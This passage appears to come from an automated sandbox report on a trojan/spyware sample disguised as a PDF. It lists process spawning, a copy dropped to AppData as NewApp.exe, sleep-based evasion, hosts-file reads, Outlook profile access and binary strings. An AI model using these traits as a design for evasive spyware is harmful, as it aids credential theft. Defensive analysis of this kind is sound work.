                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643B042
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06437E49
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438E4E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06433C0A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06439A1E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06437B2E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06439938
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E0040
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E1F9C
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E0006
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E30A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E3092
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E3D90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E2FAF
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: invalid certificate
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697398308.00000000010AB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOYSP IuQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706448464.0000000005B20000.00000002.00000001.sdmpBinary or memory string: originalfilename vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706448464.0000000005B20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.698714228.0000000003C29000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706578573.0000000005CF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696808510.00000000008A6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIGtzbNIQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706664295.0000000005DD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.913106033.000000000107A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920734902.0000000006790000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918507319.0000000005F40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbemdisp.tlbj% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.924161164.0000000006950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000000.667116345.0000000000A56000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIGtzbNIQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.923915829.00000000068E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.912393634.0000000000BE7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920690884.0000000006780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.912217696.0000000000448000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameOYSP IuQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_7|
                      Source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server
                      Source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/16@6/3
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile created: C:\Users\user\AppData\Roaming\NewAppJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2092
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1216
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD95.tmpJump to behavior
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: A4-058000200390-10-14_REV_pdf.exeReversingLabs: Detection: 12%
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe 'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbcB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.673776774.0000000004C7B000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: dnsapi.pdbJ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb` source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbjB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: urlmon.pdb* source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: iVisualBasic.pdb\3 source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb@ source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb)gc}+ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb, source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb> source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: rasadhlp.pdb& source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbx source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.PDB source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
